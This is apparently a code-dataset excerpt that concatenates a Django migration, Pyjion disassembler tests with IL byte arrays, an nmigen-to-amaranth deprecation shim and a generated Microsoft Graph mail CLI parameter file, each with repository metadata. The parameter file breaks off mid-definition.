ngageoint/voxel-globe
|
91f386de652b704942165889c10468b2c4cf4eec
|
[
"MIT"
] | 8
|
2015-07-27T19:22:03.000Z
|
2021-01-04T09:44:48.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-11 16:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('meta', '0017_adding_image_products'),
]
operations = [
migrations.AlterField(
model_name='camera',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='cameraset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='controlpoint',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='coordinatesystem',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='coordinatetransform',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='image',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='imageset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='pointcloud',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='satteleventresult',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='satteleventtrigger',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='sattelgeometryobject',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='sattelsite',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='scene',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='tiepoint',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='tiepointset',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
migrations.AlterField(
model_name='voxelworld',
name='_attributes',
field=models.TextField(blank=True, default=b'{}'),
),
]
| 32.354167
| 62
| 0.54604
| 261
| 3,106
| 6.344828
| 0.214559
| 0.193237
| 0.241546
| 0.280193
| 0.755435
| 0.755435
| 0.755435
| 0.755435
| 0.755435
| 0.724638
| 0
| 0.009929
| 0.31906
| 3,106
| 95
| 63
| 32.694737
| 0.77305
| 0.021893
| 0
| 0.727273
| 1
| 0
| 0.139044
| 0.008567
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.022727
| 0
| 0.056818
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b70c6b66d0104b863b6003ebe238cb0a2560955c
| 5,526
|
py
|
Python
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 1,137
|
2020-10-14T10:24:18.000Z
|
2022-03-31T09:37:03.000Z
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 310
|
2016-05-21T05:30:23.000Z
|
2022-03-21T00:59:57.000Z
|
Tests/test_dis.py
|
tonybaloney/Pyjion
|
eb54f950ae9dae01c4738c1e8926681681c24b75
|
[
"MIT"
] | 55
|
2016-05-20T06:11:28.000Z
|
2022-03-15T12:48:00.000Z
|
from pyjion.dis import print_il, dis, dis_native
import pyjion
import sys
import pytest
import platform
def test_offsets():
def _f(x):
return x / 2
assert _f(4) == 2.0
offsets = pyjion.offsets(_f)
assert len(offsets) > 7
def test_dis(capsys):
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
dis(test_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
def test_dis_with_offsets(capsys):
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
dis(test_f, True)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "// 0 LOAD_CONST - 1 ((1, 2, 3, 4))" in captured.out
def test_dis_with_no_pc(capsys):
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
dis(test_f, False, False)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
def test_fat_static(capsys):
test_method = bytearray(
b'\x03 h\x00\x00\x00\xd3X\n\x03(A\x00\x00\x00\x16\r!0\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x18T\x13\n\x03 h\x01\x00\x00\xd3XM\x03 h\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!P\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1cT\x13\n\x03 p\x01\x00\x00\xd3XM\x03 p\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!p\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\nT\x13\n\x03 x\x01\x00\x00\xd3XM\x03 x\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00!\x90\x19Rc\xd1\x7f\x00\x00\xd3% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x0eT\x13\n\x03 \x80\x01\x00\x00\xd3XM\x03 \x80\x01\x00\x00\xd3X\x11\n\xdf(\x10\x00\x00\x00\x06\x1f\x10T\x03 h\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1a\x00\x00\x00!0 nc\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x008G\x01\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x12T\x03 p\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xf0\xbeac\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8\x07\x01\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x14T(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008\xdc\x00\x00\x00\x08\x06\x1f\x16T\x03 x\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xb0\x8c]c\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8\xa9\x00\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x18T(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008~\x00\x00\x00\x08\x06\x1f\x1aT\x03 \x80\x01\x00\x00\xd3XM%\x0c\x16\xd3@\x1c\x00\x00\x00!\xb0\x8b]c\xd1\x7f\x00\x00\xd3(:\x00\x00\x00\x03(8\x00\x00\x00\x13\x0b8K\x00\x00\x00\x08% \x00\x00\x00\x00\xd3X%J\x17XT\x06\x1f\x1cT(\x00\x00\x00\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03(8\x00\x00\x008 \x00\x00\x00\x08\x06\x1f\x1eT\x0b8\x1c\x00\x00\x00\t\x16>\t\x00\x00\x00&&&\t\x19\xda\r+\xf08\x00\x00\x00\x00\x16\xd38\x01\x00\x00\x00\x07\x03(B\x00\x00\x00*')
print_il(test_method, symbols={})
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
def test_thin(capsys):
test_method = bytearray(b'\x03 h\x00\x00\x00\xd3X\n\x03(A\x00\x00\x00\x16\r\x06 '
b'\x00\x00\x00\x00\xd3T\x03!\xb0\xc6V)\x91\x7f\x00\x00\xd3('
b'\x00\x00\x03\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03('
b'8\x00\x00\x008\x91\x00\x00\x00\x08\x06 '
b'\x02\x00\x00\x00\xd3T!\xf0\xc3\x13*\x91\x7f\x00\x00\xd3% '
b'\x00\x00\x00\x00\xd3X%J\x17XT\x06 \x04\x00\x00\x00\xd3T('
b'\x01\x00\x01\x00%\x0c\x16\xd3@\x0b\x00\x00\x00\x03('
b'8\x00\x00\x008P\x00\x00\x00\x08\x06 \x06\x00\x00\x00\xd3T(\x10\x00\x00\x00\x06 '
b'\x08\x00\x00\x00\xd3T!\xe0\x1e\xda\x02\x01\x00\x00\x00\xd3% '
b'\x00\x00\x00\x00\xd3X%J\x17XT\x06 '
b'\n\x00\x00\x00\xd3T\x0b\xdd\x1c\x00\x00\x00\t\x16>\t\x00\x00\x00&&&\x19\tY\r+\xf08'
b'\x00\x00\x00\x00\x16\xd38\x01\x00\x00\x00\x07\x03(B\x00\x00\x00*')
print_il(test_method, symbols={})
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
@pytest.mark.skipif(sys.platform.startswith("win"), reason="no windows support yet")
@pytest.mark.skipif(platform.machine() != 'x86_64', reason="Only X64 supported")
@pytest.mark.external
@pytest.mark.graph
def test_dis_native(capsys):
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
pyjion.disable()
dis_native(test_f)
captured = capsys.readouterr()
assert "PUSH RBP" in captured.out
@pytest.mark.skipif(sys.platform.startswith("win"), reason="no windows support yet")
@pytest.mark.skipif(platform.machine() != 'x86_64', reason="Only X64 supported")
@pytest.mark.external
def test_dis_native_with_offsets(capsys):
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
pyjion.disable()
dis_native(test_f, True)
captured = capsys.readouterr()
assert "PUSH RBP" in captured.out
assert "; 10 RETURN_VALUE - None (None)" in captured.out
assert "; METHOD_" in captured.out
def test_symbols():
def test_f():
numbers = (1, 2, 3, 4)
return sum(numbers)
assert test_f() == 10
symbols = pyjion.symbols(test_f)
assert len(symbols) != 0
names = list(symbols.values())
assert "METHOD_SUBSCR_LIST_SLICE_REVERSED" in names
| 44.564516
| 1,842
| 0.640065
| 1,002
| 5,526
| 3.471058
| 0.144711
| 0.294997
| 0.20184
| 0.055204
| 0.790397
| 0.761645
| 0.730017
| 0.712478
| 0.704428
| 0.665325
| 0
| 0.229709
| 0.172819
| 5,526
| 123
| 1,843
| 44.926829
| 0.531175
| 0
| 0
| 0.510638
| 0
| 0.117021
| 0.501267
| 0.453674
| 0
| 0
| 0
| 0
| 0.212766
| 1
| 0.170213
| false
| 0
| 0.053191
| 0.010638
| 0.297872
| 0.031915
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b74334522616a59602b0489150332a3bdda00f0a
| 199
|
py
|
Python
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 528
|
2020-01-28T18:21:00.000Z
|
2021-12-09T06:27:51.000Z
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 360
|
2020-01-28T18:34:30.000Z
|
2021-12-10T08:03:32.000Z
|
nmigen/hdl/ast.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 100
|
2020-02-06T21:55:46.000Z
|
2021-11-25T19:20:44.000Z
|
from amaranth.hdl.ast import *
from amaranth.hdl.ast import __all__
import warnings
warnings.warn("instead of nmigen.hdl.ast, use amaranth.hdl.ast",
DeprecationWarning, stacklevel=2)
| 24.875
| 64
| 0.743719
| 27
| 199
| 5.333333
| 0.555556
| 0.166667
| 0.291667
| 0.25
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006024
| 0.165829
| 199
| 7
| 65
| 28.428571
| 0.861446
| 0
| 0
| 0
| 0
| 0
| 0.236181
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f85728493379361b2c836f288699eeec472df90
| 113,793
|
py
|
Python
|
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
msgraph-cli-extensions/v1_0/mail_v1_0/azext_mail_v1_0/generated/_params.py
|
thewahome/msgraph-cli
|
33127d9efa23a0e5f5303c93242fbdbb73348671
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=line-too-long
# pylint: disable=too-many-lines
# pylint: disable=too-many-statements
from msgraph.cli.core.commands.parameters import (
get_three_state_flag,
get_enum_type
)
from msgraph.cli.core.commands.validators import validate_file_or_dict
from azext_mail_v1_0.action import (
AddMailUserCreateMailFolderMultiValueExtendedProperties,
AddMailUserCreateMailFolderSingleValueExtendedProperties,
AddBody,
AddInternetMessageHeaders,
AddAttachments,
AddExtensions,
AddMailUserCreateMessageMultiValueExtendedProperties,
AddMailUserCreateMessageSingleValueExtendedProperties,
AddEmailAddress,
AddCompletedDateTime,
AddWithinSizeRange
)
def load_arguments(self, _):
with self.argument_context('mail user create-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user create-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user delete-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user delete-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user delete-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user list-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user list-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user show-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user update-inference-classification') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('overrides', type=validate_file_or_dict, help='A set of overrides for a user to always classify '
'messages from specific senders in certain ways: focused, or other. Read-only. Nullable. Expected '
'value: json-string/@json-file.')
with self.argument_context('mail user update-mail-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the '
'mailFolder. Expected value: json-string/@json-file.')
c.argument('message_rules', type=validate_file_or_dict, help='The collection of rules that apply to the '
'user\'s Inbox folder. Expected value: json-string/@json-file.')
c.argument('messages', type=validate_file_or_dict, help='The collection of messages in the mailFolder. '
'Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMailFolderMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMailFolderSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the mailFolder. '
'Read-only. Nullable.')
with self.argument_context('mail user update-message') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('message_id', type=str, help='key: id of message')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('bcc_recipients', type=validate_file_or_dict, help='The Bcc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('body', action=AddBody, nargs='+', help='itemBody')
c.argument('body_preview', type=str,
help='The first 255 characters of the message body. It is in text format.')
c.argument('cc_recipients', type=validate_file_or_dict, help='The Cc: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('conversation_id', type=str, help='The ID of the conversation the email belongs to.')
c.argument('conversation_index', help='Indicates the position of the message within the conversation.')
c.argument('has_attachments', arg_type=get_three_state_flag(), help='Indicates whether the message has '
'attachments. This property doesn\'t include inline attachments, so if a message contains only '
'inline attachments, this property is false. To verify the existence of inline attachments, parse '
'the body property to look for a src attribute, such as <IMG src=\'cid:image001.jpg@01D26CD8.6C05F07'
'0\'>.')
c.argument('importance', arg_type=get_enum_type(['low', 'normal', 'high']), help='')
c.argument('inference_classification', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('internet_message_headers', action=AddInternetMessageHeaders, nargs='+', help='A collection of '
'message headers defined by RFC5322. The set includes message headers indicating the network path '
'taken by a message from the sender to the recipient. It can also contain custom message headers '
'that hold app data for the message. Returned only on applying a $select query option. Read-only.')
c.argument('internet_message_id', type=str, help='The message ID in the format specified by RFC2822.')
c.argument('is_delivery_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('is_draft', arg_type=get_three_state_flag(), help='Indicates whether the message is a draft. A '
'message is a draft if it hasn\'t been sent yet.')
c.argument('is_read', arg_type=get_three_state_flag(), help='Indicates whether the message has been read.')
c.argument('is_read_receipt_requested', arg_type=get_three_state_flag(), help='Indicates whether a read '
'receipt is requested for the message.')
c.argument('parent_folder_id', type=str, help='The unique identifier for the message\'s parent mailFolder.')
c.argument('received_date_time', help='The date and time the message was received.')
c.argument('reply_to', type=validate_file_or_dict, help='The email addresses to use when replying. Expected '
'value: json-string/@json-file.')
c.argument('sent_date_time', help='The date and time the message was sent.')
c.argument('subject', type=str, help='The subject of the message.')
c.argument('to_recipients', type=validate_file_or_dict, help='The To: recipients for the message. Expected '
'value: json-string/@json-file.')
c.argument('unique_body', action=AddBody, nargs='+', help='itemBody')
c.argument('web_link', type=str, help='The URL to open the message in Outlook Web App.You can append an '
'ispopout argument to the end of the URL to change how the message is displayed. If ispopout is not '
'present or if it is set to 1, then the message is shown in a popout window. If ispopout is set to '
'0, then the browser will show the message in the Outlook Web App review pane.The message will open '
'in the browser if you are logged in to your mailbox via Outlook Web App. You will be prompted to '
'login if you are not already logged in with the browser.This URL can be accessed from within an '
'iFrame.')
c.argument('attachments', action=AddAttachments, nargs='+', help='The fileAttachment and itemAttachment '
'attachments for the message.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the message. Nullable.')
c.argument('multi_value_extended_properties', action=AddMailUserCreateMessageMultiValueExtendedProperties,
nargs='+', help='The collection of multi-value extended properties defined for the message. '
'Nullable.')
c.argument('single_value_extended_properties', action=AddMailUserCreateMessageSingleValueExtendedProperties,
nargs='+', help='The collection of single-value extended properties defined for the message. '
'Nullable.')
c.argument('email_address', action=AddEmailAddress, nargs='+', help='emailAddress', arg_group='Sender')
c.argument('microsoft_graph_email_address', action=AddEmailAddress, nargs='+', help='emailAddress',
arg_group='From')
c.argument('completed_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
c.argument('due_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone', arg_group='Flag')
c.argument('flag_status', arg_type=get_enum_type(['notFlagged', 'complete', 'flagged']), help='',
arg_group='Flag')
c.argument('start_date_time', action=AddCompletedDateTime, nargs='+', help='dateTimeTimeZone',
arg_group='Flag')
with self.argument_context('mail user-inference-classification create-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('classify_as', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('sender_email_address', action=AddEmailAddress, nargs='+', help='emailAddress')
with self.argument_context('mail user-inference-classification delete-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('mail user-inference-classification list-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-inference-classification show-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('mail user-inference-classification update-override') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('inference_classification_override_id', type=str,
help='key: id of inferenceClassificationOverride')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('classify_as', arg_type=get_enum_type(['focused', 'other']), help='')
c.argument('sender_email_address', action=AddEmailAddress, nargs='+', help='emailAddress')
with self.argument_context('mail user-mail-folder create-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('mail_folder_id', type=str, help='key: id of mailFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('child_folder_count', type=int, help='The number of immediate child mailFolders in the current '
'mailFolder.')
c.argument('display_name', type=str, help='The mailFolder\'s display name.')
c.argument('parent_folder_id', type=str,
help='The unique identifier for the mailFolder\'s parent mailFolder.')
c.argument('total_item_count', type=int, help='The number of items in the mailFolder.')
c.argument('unread_item_count', type=int, help='The number of items in the mailFolder marked as unread.')
